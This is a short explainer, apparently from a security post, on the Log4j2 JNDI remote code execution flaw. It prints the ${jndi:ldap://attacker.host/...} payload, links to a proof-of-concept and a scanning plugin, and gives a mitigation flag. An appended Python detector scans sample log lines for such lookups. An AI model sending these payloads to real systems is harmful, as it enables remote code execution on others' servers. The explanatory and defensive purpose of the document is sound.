How it works:
- We send a specially crafted request such as ${jndi:ldap://attacker.host/blabla} to any input that may end up being logged.
- JNDI (Java Naming and Directory Interface) in turn processes the lookup and requests data via LDAP from attacker.host.
- The response contains a Java class, which allows arbitrary code to be executed on the logging host.
PoC: https://github.com/tangxiaofeng7/apache-log4j-poc
Log4j2 RCE BurpSuite Plugin: https://github.com/whwlsfb/Log4j2Scan
Which companies are affected: https://github.com/YfryTchsGD/Log4jAttackSurface
Temporary fix: JAVA_OPTS="-Dlog4j.formatMsgNoLookups=true"
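As an added example (not code from the original post or from the linked repositories), a defender-side check in Python: it scans constructed sample access-log lines for the ${jndi:...} lookup pattern described above and verifies that a JAVA_OPTS string carries the temporary mitigation flag. The sample lines, hosts and the list of alerted JNDI schemes are assumptions.

```python
import re

# Constructed sample access-log lines for the demo (not real traffic).
SAMPLE_LINES = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01] "GET / HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:02] "GET / HTTP/1.1" 200 "-" "${jndi:ldap://attacker.host/blabla}"',
    '10.0.0.7 - - [10/Dec/2021:12:00:03] "GET /?q=${JNDI:RMI://attacker.host:1099/x} HTTP/1.1" 404',
    '10.0.0.8 - - [10/Dec/2021:12:00:04] "GET /?price=${env:HOME} HTTP/1.1" 200',
]

# A JNDI lookup as the post describes it: ${jndi:<scheme>://<host>...}.
# Assumption: we alert on the schemes JNDI can resolve remotely (ldap, ldaps, rmi, dns);
# other Log4j lookups such as ${env:...} are not matched.
JNDI_LOOKUP = re.compile(
    r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns)\s*:\s*//([^/}\s:]+)",
    re.IGNORECASE,
)

# The temporary mitigation flag from the post; log4j2. is the documented spelling
# of the same property, so both prefixes are accepted.
NO_LOOKUPS_FLAG = re.compile(r"-Dlog4j2?\.formatMsgNoLookups\s*=\s*true\b")


def find_jndi_lookups(lines):
    """Return (line_no, scheme, host) for every JNDI lookup found in the lines."""
    hits = []
    for line_no, line in enumerate(lines, 1):
        for match in JNDI_LOOKUP.finditer(line):
            hits.append((line_no, match.group(1).lower(), match.group(2)))
    return hits


def has_no_lookups_flag(java_opts):
    """True if the JAVA_OPTS string carries -Dlog4j.formatMsgNoLookups=true."""
    return NO_LOOKUPS_FLAG.search(java_opts) is not None


if __name__ == "__main__":
    for line_no, scheme, host in find_jndi_lookups(SAMPLE_LINES):
        print(f"line {line_no}: JNDI lookup via {scheme} to {host}")
    print("mitigation flag set:", has_no_lookups_flag('-Xmx1g -Dlog4j.formatMsgNoLookups=true'))
```

The formatMsgNoLookups property only exists in Log4j 2.10 and later, so on older releases the flag is silently ignored and upgrading is the only fix.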